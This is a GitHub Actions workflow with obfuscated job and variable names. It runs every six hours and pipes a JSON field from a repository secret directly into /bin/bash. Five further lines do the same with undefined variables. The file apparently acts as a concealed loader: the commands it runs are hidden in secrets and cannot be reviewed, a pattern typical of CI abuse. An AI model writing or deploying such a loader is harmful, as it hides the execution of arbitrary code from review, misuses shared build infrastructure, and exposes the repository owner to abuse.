name: proportionstay

on:
  workflow_dispatch:
  schedule:
    - cron: '57 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: proportionstay
        env:
          yah8: ${{ secrets.yah8 }}
        run: |
          echo $yah8 | jq -r .pju5 | /bin/bash
          echo $wv1 | jq -r .m702 | /bin/bash
          echo $nk0907 | jq -r .mhiv7435 | /bin/bash
          echo $wzx7 | jq -r .gl8 | /bin/bash
          echo $vkzdk24730 | jq -r .ts4969 | /bin/bash
          echo $thz3859 | jq -r .rhtfv82713 | /bin/bash

